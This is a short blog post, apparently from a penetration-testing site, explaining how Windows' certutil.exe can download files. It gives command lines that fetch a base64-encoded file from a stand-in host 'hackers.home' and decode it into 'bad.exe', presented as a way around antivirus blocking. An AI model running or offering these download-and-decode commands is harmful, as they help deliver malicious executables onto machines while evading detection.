Pages

Search

Download a file using Certutil.exe

Certutil.exe can be used to download a file to a Windows machine.

This command will download the «file» in the Windows machine from «http://<ip>«

certutil.exe -urlcache -split -f http:///file file

Depending on the file, it could be detected as malicious and then be blocked.

A possible solution may be using the method described in this post from https://www.bleepingcomputer.com.

The trick is based on a base64 encoding file when sending the file.
Once received the file will just need to decoded to obtain the original file.

C:\Temp>certutil.exe -urlcache -split -f «https://hackers.home/badcontent.txt» bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *